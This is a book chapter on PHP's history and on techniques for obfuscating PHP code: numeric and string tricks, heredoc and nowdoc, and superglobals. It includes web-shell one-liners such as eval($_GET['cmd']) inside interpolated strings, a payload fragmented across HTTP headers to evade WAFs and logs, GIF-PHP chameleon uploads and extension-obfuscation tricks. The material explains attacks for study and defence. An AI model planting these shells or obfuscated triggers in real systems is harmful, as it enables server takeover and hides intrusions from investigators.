Chapter 6. PHP
Information in this chapter:
• History and Overview
• Obfuscation in PHP
Abstract:
The PHP programming language has a rough history in terms of security and bugs. Therefore, people have been highly critical of the language. For example, a lot of problems were and still are exploitable remotely, and they enable code execution on the affected Web server, stealing information, manipulating data, and interfering with the Web application and runtime's code flow. Often, virtual private server and shared hosting solutions have been targeted by attackers, since attacking the PHP instances on one virtual server instance compromises the entire box, even if the other instances were already secured thoroughly. Also, so-called “security improvements” have been broken and rendered useless regularly. In this chapter, you will learn how PHP developed from a small collection of useful scripts to a powerful object-oriented programming language, as well as how PHP can be used to create obfuscated code. Several features for creating unreadable snippets are also discussed here.
Key words: PHP, Zend Engine, Graphics Interchange Format, Type juggling, Double-quoted string, Heredoc format, Nowdoc format, Single-quoted string, Superglobal, Curly bracket notation
PHP is an interesting programming language with quite a history—from a security point of view as well as in general. Before we start learning how the language can be used to create obfuscated code and discover the features for creating unreadable snippets, let us take a short journey through the language's history and see how it developed from a small collection of useful scripts to a powerful object-oriented programming (OOP) language. To understand this chapter properly you should have some very basic PHP skills.
History and overview
It all began in 1994, when the Greenland-born developer Rasmus Lerdorf attempted to create and publish a set of scripts that would be useful for generating interactive home pages. Most of those small tools and scripts covered logging tasks to ease the process of generating visitor stats and provide basic counters, and all were written in C and Perl. Sometime later, Lerdorf added a form interpreter and renamed the package from PHP (Personal Homepage) to PHP/FI (Personal Homepage and Form Interpreter). The first public release of the language occurred in 1995, when Lerdorf added support for database interaction, and the collection of tools became increasingly powerful in terms of helping users create interactive Web applications. At that time, the syntax did not resemble PHP as it exists today; as the following PHP/FI code example illustrates, directives were embedded in HTML comments:
<!--getenv HTTP_USER_AGENT-->
<!--ifsubstr $exec_result Mozilla-->
Hey, you are using Netscape!<p>
<!--endif-->
In 1997, Zeev Suraski and Andi Gutmans joined Lerdorf and started to rewrite the codebase. The result was PHP/FI 2, which became the foundation for the first release of PHP proper in June 1998, with the major version number 3. At this point, the meaning of the acronym changed from Personal Homepage to PHP: Hypertext Preprocessor. Meanwhile, the language continued to grow, and even became the runtime on which Suraski and Gutmans relied as they created an e-commerce solution they were working on at the time. In addition, the first steps toward OOP integration were taken at this time, with PHP 3 offering plain encapsulation of functions into class constructs.
A byproduct of the 1997 rewrite was a PHP scripting engine called the Zend Engine, and this became the flagship product of the Israel-based company Suraski and Gutmans later formed, called Zend Technologies (the name Zend is a combination of the founders' first names, Zeev and Andi). Over the next few years, PHP managed to gain quite a bit of market share among server-side runtimes for Web applications, and in May 2000, PHP 4 was released. Running on the Zend Engine 1.0, PHP 4 introduced numerous rudimentary OOP features, taking the language one step closer to “real” OOP. Four years later, in 2004, PHP 5 was released, complete with abstract classes, interfaces, and other OOP features, all based on the Zend Engine II. Table 6.1 summarizes this brief history of PHP.
Table 6.1 Major PHP Versions
Date | Version | Major Features
June 1995 | 1 | First official release
November 1997 | 2 | Performance and feature improvements; implemented in C
June 1998 | 3 | First steps toward OOP; stricter and more consistent language syntax; lots of bug fixes and more thorough beta testing
May 2000 | 4 | Another core rewrite; support for HTTP sessions and superglobals; optimization and bug fixes; more support for Web servers
July 2004 | 5 | Based on Zend Engine II; heavily improved OOP features; namespaces, anonymous functions, and the goto statement as the main additions in PHP 5.3
Forthcoming | 6 | Promises Unicode support; register_globals, safe_mode, and magic_quotes deprecated
A more detailed overview on the history of PHP and the major improvements is available at http://us2.php.net/manual/en/history.php.php.
At the time of this writing, PHP is at version 5.3.x and PHP 6 is in the works. The language is known as a user-friendly way to create Web applications very quickly, while at the same time providing an array of features, classes, libraries, and extras. There are several repositories for existing classes and toolkits, such as PEAR (PHP Extension and Application Repository), as well as for extensions written in C and other languages, such as PECL (PHP Extension Community Library). Countless Web sites offer free scripts and packages, and even more Web sites provide tutorials and courses on how to learn PHP and create applications. Needless to say, most of these tutorials focus on applications that work, not on applications that both work and have a decent level of security, which explains why so many PHP-based applications and Web sites are hopelessly insecure and often broken by design.
PHP's rough history in terms of security and bugs has made people highly critical of the language. Some sources [1] even state that PHP and security is an oxymoron, and an analysis of open vulnerability databases rather supports that contention. A lot of problems were and still are remotely exploitable and enable code execution on the affected Web server, stealing information, manipulating data, and interfering with the Web application's and the runtime's code flow. Often, virtual private server (VPS) and shared hosting solutions have been targeted by attackers, since attacking the PHP instances on one virtual server instance compromises the entire box, even if the other instances were secured thoroughly. Also, so-called “security improvements,” such as magic_quotes and safe_mode, have been broken and rendered useless quite regularly (see http://php.net/manual/en/security.magicquotes.php and http://php.net/manual/en/features.safe-mode.php).
Several projects have been formed to deal with the aforementioned problems. One of the most powerful and popular of these projects is known as Suhosin, which was created by Stefan Esser, an ex-member of the PHP core team. (It is amusing to follow the discussions which led to Esser's exit from the team and his subsequent creation of the Suhosin project, but the language used might not be suitable for the faint of heart.)
So, to avoid getting stuck in the history of PHP and its countless vulnerabilities, let us look at how we can get PHP code running on a Web server. A CLI module is available, but we will not focus on it. Since PHP files are being parsed whenever they are requested, the language is not really the fastest way to deliver interactive content in Web applications. There are numerous approaches to deal with that issue, among them caching engines such as XCache, Alternative PHP Cache (APC), and comparable solutions, as well as interesting projects such as HipHop (HPHP), designed and implemented by the Facebook development team to generate binary files from complete PHP Web applications to drastically increase Web site performance.
Obfuscation in PHP
There are countless ways to execute PHP code as soon as PHP has been installed. One of the most common and easiest-to-use configurations is known as LAMP, which stands for Linux, Apache, MySQL, and PHP.
For the code samples in this chapter, the Apache 2.2.12 server and PHP 5.2.10-2ubuntu6.3 were used primarily. Some of the code examples use the new features introduced in PHP 5.3 (which was not available as a packaged version at the time of this writing). Other code examples in this chapter will work smoothly only when PHP error reporting is switched off, which is usually the case on production servers and live Web sites.
If you do not have a PHP environment in which to run your own PHP obfuscation tests, visit http://codepad.org, which provides a free tool for evaluating arbitrary PHP code.
A lot of other languages are supported as well. For PHP, be sure you enter starting delimiters, such as <?php or <?, to make it work.
For our obfuscation scenario, let us assume the Web server (Apache in our case) receives a request from a client. Depending on the object and file extension the client is asking for, the Web server decides which runtime to use to deliver the requested data. Usually the following file extensions are connected with the PHP runtime:
<IfModule mod_php5.c>
AddType application/x-httpd-php .php .phtml .php3
AddType application/x-httpd-php-source .phps
</IfModule>
You can find that snippet of code connecting file extensions with the runtime in your Web server configuration file or folder, depending on the operating system distribution being used. In the following examples, we will assume our test files are suffixed with a .php extension. In some situations, we will tamper with this extension to show how to smuggle in files with different extensions and have them be parsed and executed by PHP. We saw a very atavistic example of PHP code coming from the dark ages of PHP/FI at the beginning of this chapter. Now let us look at how to execute PHP code inside PHP files we can use today:
<?php echo 'works fine'; ?>
<? echo 'works too - if short_open_tag is enabled (default=On)'; ?>
<% echo 'works - in case asp_tags are being enabled (default=Off)'; %>
<?= 'oh - it echoes directly!' ?>
<%= 'same for ASP like tags' %>
As you can see, there are several ways to get PHP code to run. The next snippet shows the portion of the main PHP configuration file, the php.ini file, which is responsible for enabling and disabling those methods of delimiting code:
; Allow the <? tag. Otherwise, only <?php and <script> tags are recognized.
; NOTE: Using short tags should be avoided when developing applications or
; libraries that are meant for redistribution, or deployment on PHP
; servers which are not under your control, because short tags may not
; be supported on the target server. For portable, redistributable code,
; be sure not to use short tags.
short_open_tag = On
; Allow ASP-style <% %> tags.
asp_tags = Off
The <? syntax is nice and short and appreciated by template developers, but it causes trouble for developers used to dealing with XML: the notation overlaps with the opening of XML processing instructions, forcing the developer to create a lot of overhead to make sure that XML code is not parsed as PHP and vice versa.
In the preceding code, the <?= delimiter syntax implies that only echoing of strings and variables is possible. We can quickly disprove that by using a simple ternary operator, turning the entire example into arbitrary code. Next, we will attempt to call the phpinfo() function, which will give us nicely formatted output and tell us about the most important configuration and runtime parameters of the currently installed instance.
A Request for Comments (RFC) from 2008 proposes to enable <?= even if short_open_tag is switched off (see http://wiki.php.net/rfc/shortags).
<?= 'Just an echo?' ? eval('phpinfo();') : 0; ?>
Thus far, we have seen how to delimit code inside PHP files, and we learned that the Web server determines the file type based on its extension. Therefore, if a file extension is .php or .php3, or even .phtml, the Web server will delegate the request to the PHP runtime and have it do the dirty work of parsing and processing the requested object. But what if the file extension is not .php, and instead is unknown or is something similar to .php? In this case, the default configuration of Apache 2 tries to walk backward in the filename and figure out what the real extension, and thus the MIME type, could be. This is actually a terrible security problem, since there are many ways to obfuscate the filename and make the Web server think it is a PHP file. Here is a short list of the possible extension obfuscations from which an attacker can choose:
• test.php
• test.php.
• test.php…
• test.php.123
• .php.
• .php…
• php.
• .php…123
Files with these file extensions will automagically be considered PHP files and will be delegated to the PHP runtime. This is a rather dangerous feature, as it renders vulnerable those Web applications that provide uploads yet lack proper file extension validation. Additionally, on UNIX-based systems, files prefixed with a dot are usually treated as hidden; thus they are not visible in directory listings and unparameterized calls of the console commands dir and ls. Apache also assists in the other direction, allowing us to request files and objects without an explicitly mentioned extension. So, for example, requesting http://localhost/test will automatically deliver http://localhost/test.php, if there's no other file named test or test.html. Therefore, a file called .php.php can be requested with either .php or .php.php.
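From the defender's side, the risk can be reduced by checking every dot-separated segment of an uploaded filename rather than only the last one. The following is a minimal sketch under that assumption; the function name hasPhpSegment() and the list of blocked extensions are hypothetical and would have to match the extension mappings actually configured on the server.

```php
<?php
// Hypothetical helper, not part of PHP: returns true if ANY segment after
// the first dot is an extension we assume the server maps to PHP.
function hasPhpSegment(string $filename, array $blocked = ['php', 'php3', 'phtml', 'phps']): bool
{
    // Look at the final path component only, case-insensitively.
    $segments = explode('.', strtolower(basename($filename)));
    array_shift($segments); // discard the part before the first dot

    foreach ($segments as $segment) {
        if (in_array($segment, $blocked, true)) {
            return true;
        }
    }
    return false;
}

$candidates = ['test.php', 'test.php.123', '.php.', 'avatar.gif.php', 'avatar.gif'];
foreach ($candidates as $name) {
    echo $name, ' => ', hasPhpSegment($name) ? 'reject' : 'accept', "\n";
}
```

A deny list like this is only a stopgap. An allow list of expected extensions, combined with storing uploads outside the Web root, is generally the more robust design.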
Of course, it is possible to create chameleon files containing valid Graphics Interchange Format (GIF) image data as well as PHP code. Figure 6.1 shows a basic example of a small GIF-PHP chameleon. If the targeted application accepts uploads and does not validate the extension properly, it is easy to upload such a chameleon and execute arbitrary PHP code on the box afterward. The easiest way to do so is to add some PHP code inside the comments section of the GIF file and rename it to have an extension such as .gif.php or something similar.
Figure 6.1
An infected GIF File shown via the Hex Editor.
Although this problem is neither new nor very sophisticated, it remains unfixed and affects a lot of Web applications in the wild. The output will be:
GIF89a[non-printable bytes]ÿÿÿÿÿÿ!þyay![non-printable byte],[non-printable bytes]D[non-printable byte];
Comparable problems exist for other characters embedded in filenames. You can find a good article on this at www.ush.it/2009/02/08/php-filesystem-attack-vectors/.
At this point, you might be able to see where we are heading in this chapter. We have barely started, and already we discovered several ways to mess with PHP and Web servers utilizing PHP. The problem that is connected with these and the following examples is the fact that PHP is extremely powerful and provides a lot of APIs and native functions that allow evaluation of code, inclusion of files to execute their code or unveil their content, and actual delegation of system commands to the targeted server's console via functions such as exec(), shell_exec(), system(), and passthru().
Let us get to the basics of PHP obfuscation, and see how we can solve these and other problems, such as generating numbers, generating strings, and finding ways to mix in code structures and arbitrary characters, to make the code snippet as difficult to find and decode as possible. To start, take a look at the following example:
<?php
$${'_x'.array().'_'}=create_function(
'$a', 'retur'.@false.'n ev'.a.'l($a);');$$_x_('echo 1;'
);
This snippet is nothing more than a small and obfuscated kick-starter for regular string evaluation. You can easily spot the string to evaluate; it's echo 1;. But the evaluation method itself is a bit harder to find.
PHP and numerical data types
In PHP obfuscation, numerical values play an important role, just as they do in JavaScript obfuscation. We can use numerical values for a lot of things, including generating huge numbers and converting them to other representations to extract certain characters, or just accessing elements inside an array or even a string. It is also possible to access array elements, but it is not possible to access elements of hash maps, unless the key matches the numerical value accessing it. However, strings count as arrays in terms of accessing their elements. Let us look at an example:
<?php
$a=array(1,2,3,4,5); echo $a[1]; // echoes 2
$a=array('1' => 2, '3' => 4); echo $a[1]; // echoes 2
$a=array(0, 1, '1' => 2, '3' => 4); echo $a[1]; // echoes 2
$a='12345'; echo $a[1]; // echoes 2
All four lines of code in the preceding example echo the same value: 2. As you can see, just as in JavaScript, it is not possible to access elements of hash maps in this way. The key ‘1’ is selected in favor of the element with the index 1; otherwise, the output of this script would have been 2212 and not 2222. But how can we create more chaotic-looking numerical values to access array and string elements? PHP provides a lot of possibilities for that purpose.
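The reason the key '1' wins can be made visible by inspecting the keys PHP actually stores. This is a small sketch using only array_keys() and count(); the variable names are ours, chosen for illustration.

```php
<?php
// String keys that look like decimal integers are stored as integer keys.
$map = array('1' => 2, '3' => 4);
var_dump(array_keys($map) === array(1, 3)); // bool(true)

// A later '1' => 2 therefore overwrites the element at index 1.
$mixed = array(0, 1, '1' => 2, '3' => 4);
echo $mixed[1], "\n";      // 2
echo count($mixed), "\n";  // 3

// A key that is not a canonical integer string stays a string.
$other = array('01' => 'x');
var_dump(array_keys($other) === array('01')); // bool(true)
```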
First, there are a lot of numerical representations that we can choose from. Since PHP is a dynamically typed language, the actual type or format of the numerical value usually does not matter. This often has terrible consequences in terms of application security, because in many situations, an attacker can misuse this fact and cause heavy disturbances in code flow. There is a nice write-up on this so-called type juggling technique in PHP, at http://us3.php.net/manual/en/language.types.type-juggling.php.
If the developer forgot that true can be equivalent to 1, and even to "1" or count(false) and other statements, the consequences can be grave. We will not go into much detail on vulnerabilities such as this, but in the context of obfuscation and circumvention it might be interesting to know that true can be replaced with 1 or "1", or with other statements if the developer was not extra careful.
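A brief sketch of why this matters: loose comparison (==) converts its operands before comparing, while strict comparison (===) also compares types. The snippet uses only literal values, and the array names are chosen for illustration.

```php
<?php
// Loose comparisons: operands are converted before being compared.
$loose = array(
    'true == 1'   => (true == 1),
    'true == "1"' => (true == "1"),
    '"1" == 1'    => ("1" == 1),
    '"1" == "01"' => ("1" == "01"), // numeric strings compare as numbers
);

// Strict comparisons: value AND type must match.
$strict = array(
    'true === 1' => (true === 1),
    '"1" === 1'  => ("1" === 1),
);

foreach ($loose + $strict as $expression => $result) {
    echo $expression, ' => ', var_export($result, true), "\n";
}
```

Every loose comparison above yields true and every strict one yields false, which is why security-relevant checks are usually written with ===.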
The following examples show some of the ways to represent numerical data in PHP. The PHP documentation on number formats is paved with warnings, and not without reason: we can expect a lot of quirky behavior when working with numbers in a dynamically typed language. [2]
<?php
$a='12345';
echo $a[1]; //2 - decimal index
echo $a[000000000000000000000001]; //2 - octal index
echo $a[0x00000000000000000000001]; //2 - hexadecimal index
echo $a["000000000000000000000001"]; //2
echo $a[1.00001]; //2
echo $a[1e0]; //2
echo $a[true]; //2
echo $a[count(false)]; //2
echo $a[0+1*1/1]; //2
echo $a["1x1abdcefg"]; //2
You can see from this example that the PHP runtime does not care about the actual type when accessing the matching substring. The only important thing here is the actual value. Also, PHP tends to ignore almost arbitrary trailing data; as soon as the numerical value has been parsed, everything else will be ignored, just like in the previous example snippet. However, in addition to using these representations, we can also use the casting functionalities PHP provides. We basically have two ways to do this: we can use functions to do the job and we can use the (datatype) syntax. Let us have a look:
<?php
$a='12345';
echo $a[(int)"1E+1000"]; //2
echo $a[(int)true]; //2
echo $a[(int)!0]; //2
echo $a[(float)"1.11"]; //2
echo $a[intval("1abcdefghijk")]; //2
echo $a[(float)array(0)]; //2
echo $a[(float)(int)(float)(int)' 1x ']; //2
These examples made use of not only casted strings but also casted arrays and Booleans. Also, PHP does not really care about the amount of casting used on a string or other token, as the last example shows. Furthermore, whitespace can be used again for additional obfuscation, and therefore make it more difficult to find out that (float)(int)(float)(int)' 1x ' represents nothing more than 1.00.
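For readers who want to verify the idea on a current installation, here is a hedged sketch that restricts itself to explicit casts and literals, which we assume behave the same way on recent PHP releases as on the versions used in this chapter. The variable names are ours.

```php
<?php
$s = '12345';

// Each expression below is expected to evaluate to the integer 1.
$indexes = array(
    1,
    01,                   // octal literal
    0x1,                  // hexadecimal literal
    (int) true,
    (int) !0,
    (int) 1.9,            // floats are truncated toward zero
    (int) '1abc',         // trailing characters are dropped by the cast
    (int) (float) '1.11',
    intval(" \t\n1x"),    // leading whitespace is skipped
);

$out = '';
foreach ($indexes as $i) {
    $out .= $s[$i];       // always the second character of $s
}
echo $out, "\n"; // 222222222
```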
This method of generating numbers provides a plethora of possibilities. For instance, we can generate numbers by using strings containing numbers, and by casting and calling functions such as intval(). And of course, we can generate 0 and 1 from all functions and methods returning either false or true, or we can generate numerical values from calls that take empty strings and other data types as arguments, such as count(false), levenshtein(a,b), rand(0001,00001), and so on. With properly quoted strings, we can even use special characters such as line breaks and tabs for obfuscation, not just the classic whitespace.
<?php
$a = 1; $b = " \r\t \n 2xyz";
echo $a+$b; //3
We can, of course, also use PHP's automatic casting to perform mathematical operations on strings and other objects, or make use of bit-shift and comparison. The possibilities are endless.
<?php
$a='12345';
echo $a[""%1.]; //1
echo $a[!""^0x1]; //1
echo $a[""<>!1E1]; //1
echo $a[""<<1.]; //1
Strings
The following sections will shed some light on how strings can be generated in PHP, and what kinds of string delimiters exist. We will learn about what makes double-quoted strings special and how we can use them for obfuscation, as well as what nowdocs and heredocs are and how we can utilize binary strings for extra obfuscation.
Introducing and delimiting strings
PHP features many ways to introduce and create strings. Most of them are known from other programming languages and are listed and explained in the PHP documentation. [3]
The most common way to work with strings in PHP is to make use of single or double quotes for delimiting. Both ways work fine, although a double-quoted string is treated differently by PHP than a single-quoted string. Double-quoted strings, for example, can contain escape sequences for special characters such as line breaks or tabs, and even null bytes, so if the developer uses a construct such as "hello\ngoodbye" it will be treated differently than 'hello\ngoodbye'. The first example will actually contain the newline, while the second version will just show the character sequence backslash and the letter n.
Quite a range of escape sequences can be used, starting with the null byte \0, several kinds of control characters, the carriage return/line feed combination, and whitespace such as \n, \r, \v, and \t. Of course, the escape character can also be escaped, with \\, and to prevent the variable from expanding, we can use \$. It is even possible to make use of octal and hexadecimal entities inside double-quoted strings. The syntax, as you may have guessed, is \[tableindex] or \x[tableindex]. Let us look at some examples:
<?php
echo 'hello\t\v\f\r\ngoodbye'; //hello\t\v\f\r\ngoodbye
echo "hello\t\v\f\r\ngoodbye"; //hello[CRLF and whitespace]goodbye
echo 'hello\0goodbye'; // hello\0goodbye
echo "hello\0goodbye"; // hello[NULLBYTE]goodbye
echo 'h\x65llo\040goodbye'; // h\x65llo\040goodbye
echo "h\x65llo\040goodbye"; // hello goodbye
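Because control characters are invisible in echoed output, the difference is easier to confirm by measuring the strings. The following sketch uses strlen() and bin2hex() for that purpose; the variable names are illustrative.

```php
<?php
$single = 'a\nb'; // four characters: a, backslash, n, b
$double = "a\nb"; // three characters: a, line feed, b

echo strlen($single), "\n"; // 4
echo strlen($double), "\n"; // 3

// Hexadecimal and octal escapes are resolved only inside double quotes.
var_dump("h\x65llo\040goodbye" === 'hello goodbye'); // bool(true)

// bin2hex() reveals bytes that would otherwise be invisible.
echo bin2hex("\0\t"), "\n"; // 0009
```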
The same is true for variables embedded inside double-quoted strings. All variables embedded in double-quoted strings will be parsed and (as mentioned in the PHP manual) expanded. That means their content will be joined in the string at the position they were added. This is a nice feature, because it saves some typing work, especially regarding concatenation operators. At the same time, however, it can be dangerous to use. First, let us look at the syntax. Basically, it is just embedding the variables inside the string, as in "hello$a goodbye!". If $a is set to contain an exclamation mark, the result will be hello! goodbye!. There are several variations regarding the syntax we can use here. PHP has an affinity for curly brackets. As we can see, the following examples work too:
<?php
$a = ' ';
echo "hello{$a}goodbye"; // hello goodbye
echo "hello${a}goodbye"; // hello goodbye
echo "hello{${a}}goodbye"; // hello goodbye
This support for delimiting the label of the variable to expand is necessary, since the parser cannot really know where the label ends and the rest of the string begins. Take the construct hello$agoodbye; will it result in $a or $ag or $agood? There is no way to find that out for sure. But there is more we can do inside double-quoted strings. For example, we can access array indexes, as well as members of objects. And since we already know that PHP allows us to access strings like arrays, we can add some more obfuscation spice:
<?php
$a = array(' ');
$b = ' ';
echo "hello{$a[0]}goodbye"; // hello goodbye
echo "hello{$b[0]}goodbye"; // hello goodbye
echo "hello{$b[""<>!1E1]}goodbye"; //hello goodbye
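The label ambiguity mentioned above can be demonstrated directly. In this sketch, both $a and $agoodbye are defined (names chosen for illustration) so that it is visible which label the parser picks with and without curly brackets.

```php
<?php
$a = '!';
$agoodbye = '?';
$list = array('!');

// Without brackets, the parser takes the longest valid label: $agoodbye.
$greedy = "hello$agoodbye";

// Curly brackets delimit the label explicitly.
$delimited = "hello{$a}goodbye";

// The same notation reaches array elements and string offsets.
$fromArray  = "hello{$list[0]}goodbye";
$fromString = "hello{$a[0]}goodbye";

echo $greedy, "\n";     // hello?
echo $delimited, "\n";  // hello!goodbye
echo $fromArray, "\n";  // hello!goodbye
echo $fromString, "\n"; // hello!goodbye
```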
Not only is it possible to access array indexes, play with numerical obfuscation, and access strings inside double-quoted strings, but we can also call functions and object methods:
<?php
$a = ' ';
echo "hello{$a[phpinfo()]}goodbye";
echo "hello{$a[eval($_GET['cmd'])]}goodbye";
The first example snippet shows how to call the phpinfo() function. The second one already implements a small shell to evaluate everything coming in from the GET parameter cmd. So, if the script containing this code is called with test.php?cmd=echo%201; the output will be hello goodbye1hello goodbye, showing that the code will be executed before the echo statement is finished. Note that the index 0 of the variable $a is being used too, since the eval call returns nothing, which is equivalent to 0 in PHP.
But PHP allows more ways to work with strings. For example, we can work with strings that are not quoted at all. The following example will throw a notice on configurations where the error reporting is enabled, but it will still work fine:
<?php
$a = 'def';
echo abc. $a; // abcdef
Since version 4, PHP has supported the heredoc syntax, and since version 5.3, it has supported quoted heredoc labels and the slightly advanced nowdoc format.
Heredoc and nowdoc are probably best known among command-line programmers, since this method of string encapsulation is supported by the Bourne shell, zsh, Perl, and many other related languages and dialects.
PHP treats strings inside heredoc blocks like double-quoted strings, so escaped character sequences can be used and variable expansion is enabled, as the next examples demonstrate. Also, newlines and other comparable control chars are preserved. Nowdoc does not expand variables, so what heredoc is for double-quoted strings, nowdoc is for single-quoted strings.
<?php
$a = '!';
$b = <<<X
hello goodby$a
X;
echo $b;
// PHP 5.3+ only
$c = <<<'X'
hello goodbye!
X;
echo $c;
$_ = '!';echo b<<<_µ
h\x65llo{$a[eval($_GET['cmd'])]}goodbye$_
_µ;
There is yet another way to introduce and generate a string in PHP that is not as well known as the techniques we already discussed. You may have already spotted it in the preceding snippet. It is the binary string feature, where strings are introduced by the letter b preceding the actual quoting. It looks like this:
$a = b'hello goodbye';
echo $a; //hello goodbye
This might be particularly interesting to sneak past filter rules and badly written parsers, and can be used with single- and double-quoted strings as well as with heredoc and nowdoc.
<?php
$a = b<<<X
hello goodbye!
X;
echo $a;
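To make the contrast between heredoc and nowdoc concrete, the following sketch feeds the same body text to both formats and compares the results. It assumes PHP 5.3 or later, since nowdoc and quoted labels are not available before that; the label TXT and the variable names are arbitrary.

```php
<?php
$name = 'world';

// Heredoc: behaves like a double-quoted string.
$heredoc = <<<TXT
hello $name\x21
TXT;

// Nowdoc: behaves like a single-quoted string, nothing is expanded.
$nowdoc = <<<'TXT'
hello $name\x21
TXT;

var_dump($heredoc === 'hello world!');   // bool(true)
var_dump($nowdoc === 'hello $name\x21'); // bool(true)
```

Note that the closing label of a nowdoc is written without quotes, exactly like the closing label of a heredoc.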
As soon as we have generated the string, PHP provides us with a plethora of functions that we can use to add and remove additional encoding and obfuscation. It starts with the entity encoding and decoding we already know, using html_entity_decode() and comparable functions, and ranges from base64_decode() to functions such as str_rot13(), which performs a ROT13 encoding by rotating each letter 13 places through the alphabet, and so on. Of course, PHP also provides functions for getting a character by its table index, as in chr(). The use of chr() will be pretty interesting in PHP 6, since it will support Unicode codepoints as well as characters and codepoints from the ASCII table (see http://php.net/manual/en/function.chr.php).
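The layering of such functions can be sketched with a harmless string. The example below wraps the text echo 1; in ROT13 and Base64 and unwraps it again; nothing is evaluated, and the variable names are ours.

```php
<?php
$plain = 'echo 1;';

// chr() builds a string from ASCII table indexes.
$fromChr = chr(101) . chr(99) . chr(104) . chr(111); // "echo"

// Layer 1: ROT13 rotates letters only; digits and punctuation stay.
$rotated = str_rot13($plain); // "rpub 1;"

// Layer 2: Base64 on top of ROT13.
$wrapped = base64_encode($rotated);

// Unwrapping applies the inverse steps in reverse order.
$restored = str_rot13(base64_decode($wrapped));

echo $fromChr, "\n";
echo $rotated, "\n";
echo $wrapped, "\n";
var_dump($restored === $plain); // bool(true)
```

For an analyst, the useful observation is the reverse one: each layer is trivially reversible once it has been recognized, so the obfuscation lies in hiding which layers were applied and in which order.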
PHP also provides actual encryption functions, which can be useful in code obfuscation as well. If an attacker finds a way to hide the key for the decryption from the eyes of the forensics specialist trying to analyze the payload afterward, even low encryption quality can be pretty effective and can require hours of work to actually decipher the code. In the next section, we will discuss some of the ways we can do this.
A versatile attacker (be it in a penetration test or a real attack scenario) wants to make sure that both payload and trigger for the attack are hard to find and detect.
One way is to split the payload and spread it over many places the attacker can control.
PHP is perfect for this. Attackers can use the whole range of input channels from HTTP headers, to POST data, external URLs and even temporary files and uploads. Think of an attack where encrypted strings are being used and the key is hidden in the comment section of one of thousands of legitimately uploaded images.
Using superglobals
Since PHP 4, developers have had access to superglobals, which are predefined variables available in the global scope (see www.php.net/manual/en/language.variables.superglobals.php). They are meant to ease access to data embedded in the HTTP GET string or the POST body as well as other data structures provided by the user, the runtime, and the Web server. Table 6.2 lists the currently available set of superglobals and gives a short explanation of each.
Table 6.2 Superglobals in PHP
Variable | Description
$_GET | This superglobal array contains all data that was passed via URL parameters, using a syntax defined in RFC 3986 (http://tools.ietf.org/html/rfc3986)
$_POST | This array contains all available data from the POST body of a request. Unlike the GET data, this information is usually not logged
$_COOKIE | This array contains the cookie data properly formatted as an array
$_REQUEST | The request array contains GET, POST, and cookie data in a merged form. The order of overwriting in case similarly named data is coming in from different channels is given via the PHP configuration setting variables_order. PHP 5.3 introduced a new equivalent setting called request_order
$_SESSION | This array contains all data being stored in the session, if it exists. If the application does not use sessions, the array is simply empty
$_SERVER | This array contains environmental information about the runtime and the Web server. Several of its fields can be influenced by the client
$_ENV | This array replaced the deprecated $HTTP_ENV_VARS in PHP 4.1.0. Similar to $_SERVER, this array contains environmental information about the runtime and the Web server used. $_ENV is mostly used for command-line PHP
$_FILES | This array contains information about uploaded files, such as the filename, file size, and MIME type. All of these data, including the MIME type, can be controlled by an attacker. In PHP versions earlier than 4.3.0, the $_REQUEST array also contained the $_FILES data
$GLOBALS | $GLOBALS is the universal reference to all variables that are available in the global scope. It can be considered to be the father of all superglobals, since it was present in very early versions of PHP. $_GET, for example, can be accessed directly or via $GLOBALS['_GET'], as can the other superglobals mentioned
Superglobals are easy to access. Let us see how to get information on a given _GET variable, assuming we call the test script we use with the _GET parameter a=1:
<?php
echo $_GET[a];
echo $_GET['a'];
echo $HTTP_GET_VARS['a'];
echo $GLOBALS[_GET]['a'];
echo $_REQUEST[x.x.x.xa];
echo $_REQUEST['a'.$x];
echo $_SERVER[QUERY_STRING];
echo $_SERVER[REQUEST_URI];
echo $_SERVER[argv][0];
echo $HTTP_SERVER_VARS[argv][0];
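Several of the variants above depend on behavior that newer PHP releases reject: unquoted keys such as $_GET[a] raise an Error on PHP 8, and $HTTP_GET_VARS was removed in PHP 5.4. As a minimal sketch, assuming PHP 7 or later and a simulated request parameter a=1, the following shows three access paths that still resolve to the same value. The helper name read_get_variants() is hypothetical and exists only for this illustration.

```php
<?php
// Simulate test.php?a=1 so the sketch also runs from the command line.
$_GET['a'] = '1';

// Hypothetical helper: reads one GET parameter through three equivalent paths.
function read_get_variants(string $key): array
{
    $empty = null; // stands in for the undefined $x used in the listing above
    return [
        'direct'  => $_GET[$key],             // plain superglobal access
        'globals' => $GLOBALS['_GET'][$key],  // detour through $GLOBALS
        'padded'  => $_GET[$key . $empty],    // key assembled by concatenation
    ];
}

print_r(read_get_variants('a'));
```

All three entries hold the same string, which is why a filter that only looks for the literal text $_GET['a'] misses the other two forms.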
For additional payload obfuscation, $_GET can be considered the least useful, since everything coming in via $_GET will be visible in the Web server's logfiles for later analysis. The POST body of a request is, thus, far more interesting, since an attacker can just create a small snippet of code triggering an evaluation while the actual payload is coming from a POST variable. The same is true for several variables in the $_SERVER array. Several fields in this array can be modified by the attacker and filled with short triggers or even fragmented data, possibly bypassing logging mechanisms, Web application firewalls (WAFs), or intrusion detection systems. Also, in PHP versions before 5.4 with register_long_arrays enabled, the deprecated equivalents can still be used, so not only does $_SERVER contain the environmental and runtime data but so also does $HTTP_SERVER_VARS.
Now let us use JavaScript and the XMLHttpRequest (XHR) object to see an example of how to manipulate field values in the _SERVER array. The following code snippet shows how to craft Ajax requests and attempt to overwrite the necessary fields:
<script>
x=new XMLHttpRequest;
x.open('GET','test.php');
x.setRequestHeader('User-Agent','bar');
x.setRequestHeader('Accept','bar');
x.setRequestHeader('Accept-Language','bar');
x.setRequestHeader('Cookie','bar');
x.send()
</script>
Usually, user agents append the additional cookie data to the existing cookie string, so a little bit of regular expression magic would be necessary to get to the correct set of data. Of course, it is also possible to define and use arbitrary header data and hide the payload, and this is mostly used in situations where a WAF or intrusion detection system needs to be bypassed. Here is an example that illustrates the possible use of superglobals in obfuscation:
echo b<<<_µ
h\x65llo{$a[eval($_SERVER['HTTP_FOO'].$_SERVER['HTTP_ACCEPT'])]}goodbye
_µ;
The example shows a very simple use of a fragmented payload coming from one self-defined request header and one request header that was overwritten by the attacking user agent. Even if the attack is noticed after it occurs it will be very hard to determine what the actual payload consisted of.
To obfuscate access to the necessary superglobal array it's possible to cast it into another data type beforehand—for example, to have it be an object of the type stdClass. Any existing object can, of course, also be cast back to be of type array too:
<?php
$_GET=(object)$_GET;
echo $_GET->a;
$_GET=(array)$_GET;
echo $_GET['a'];
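Unfortunately, casting a complex data type to a simple string will not cause an implicit serialization. Casting an array to a string just returns the name of the former data type (the literal string Array), and an object without a __toString() method cannot be cast to a string at all.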
